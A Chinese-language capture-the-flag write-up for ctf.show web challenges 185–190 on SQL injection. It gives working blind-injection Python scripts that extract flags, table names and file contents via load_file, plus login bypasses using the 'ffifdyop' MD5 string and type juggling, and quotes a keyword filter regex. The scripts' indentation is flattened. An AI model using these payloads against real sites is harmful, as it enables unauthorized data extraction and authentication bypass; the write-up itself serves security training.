web185

这道题还有另外一个脚本就是用concat的拼接达到有数字的目的

concat(true+true) == 2 concat(true) == 1
concat(true, true)== 11
然后上脚本（Y4tacker这个师傅的）

# @Author:Y4tacker
import requestsurl = "http://341e93e1-a1e7-446a-b7fc-75beb0e88086.chall.ctf.show/select-waf.php"flag = 'flag{'def createNum(n):num = 'true'if n == 1:return 'true'else:for i in range(n - 1):num += "+true"return numfor i in range(45):if i <= 5:continuefor j in range(127):data = {"tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"}r = requests.post(url, data=data)if r.text.find("$user_count = 43;") > 0:if chr(j) != ".":flag += chr(j)print(flag.lower())if chr(j) == "}":exit(0)break

8-4-4-4-12自己把flag写出来

web186

与上题相同

web187

$username = $_POST['username'];$password = md5($_POST['password'],true);//只有admin可以获得flagif($username!='admin'){$ret['msg']='用户名不存在';die(json_encode($ret));}

这道题密码被MD5 加密，而且第二个参数是true
去查了一下ffifdyop类似与一个万能密码就可以绕过

登录成功但是没有回显
抓包

web188

正则绕过上面的东西并且password只能是数字而且是整数
SQl弱类型隐式转换

0==admin
0==password，就可以直接绕过了

web189

flag在api/index.php文件中
这是题目的提示

 if(preg_match('/select|and| |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\x26|\x7c|or|into|from|where|join|sleep|benchmark/i', $username)){$ret['msg']='用户名非法';die(json_encode($ret));}

过滤了这些东西
用load_file，判断有回显的地方

查询失败表示没有用户，username错误
密码错误就说明有回显
结果就是username=0是有回显

用脚本进行布尔盲注

import requests
import timeurl = "http://dc02940d-e22b-4796-ab0f-04bdf57d3a9f.challenge.ctf.show/api/"
flagstr = "}{<>$=,;_ 'abcdefghijklmnopqr-stuvwxyz0123456789"flag = ""
#这个位置，是群主耗费很长时间跑出来的位置~
for i in range(257,257+60):for x in flagstr:data={"username":"if(substr(load_file('/var/www/html/api/index.php'),{},1)=('{}'),1,0)".format(i,x),"password":"0"}print(data)response = requests.post(url,data=data)time.sleep(0.3)# 8d25是username=1时的页面返回内容包含的，具体可以看上面的截图~if response.text.find("8d25")>0:print("++++++++++++++++++ {} is right".format(x))flag+=xbreakelse:continueprint(flag)

就是跑的有点慢
username没有用引号所以还可以用if或者case

# @Author:Kradress
from operator import concat
import requests
import stringurl = 'http://2e697a15-84fe-4c2d-988f-37edb5260613.challenge.ctf.show/api/'
uuid = string.digits+string.ascii_lowercase+"-}"
passwd = "if(load_file('/var/www/html/api/index.php')regexp('ctfshow{" #ctfshow{
flag = 'ctfshow{'for i in range(40):for char in uuid:print(char)data = {'username' : passwd + f"{char}'),0,1)",'password' : 0}res = requests.post(url, data=data)if "\\u5bc6\\u7801\\u9519\\u8bef" in res.text:passwd += charprint(passwd)break

这个脚本快的不行

web190

username带引号了，但是密码的返回还是一样，先找回显

import requests
import sys
import timeurl = "http://36e8713a-b1fb-49c2-badb-4c4d66f5d1cb.challenge.ctf.show/api/"
flag = ""
for i in range(1,60):max = 127min = 32while 1:mid = (max+min)>>1if(min == mid):flag += chr(mid)print(flag)break#payload = "admin'and (ascii(substr((select database()),{},1))<{})#".format(i,mid)#ctfshow_web#payload = "admin'and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{})#".format(i,mid)#ctfshow_fl0g#payload = "admin'and (ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<{})#".format(i,mid)#id,f1agpayload = "admin'and (ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{})#".format(i,mid)data = {"username":payload,"password":0,}res = requests.post(url = url,data =data)time.sleep(0.3)if res.text.find("8bef")>0:max = midelse:min = mid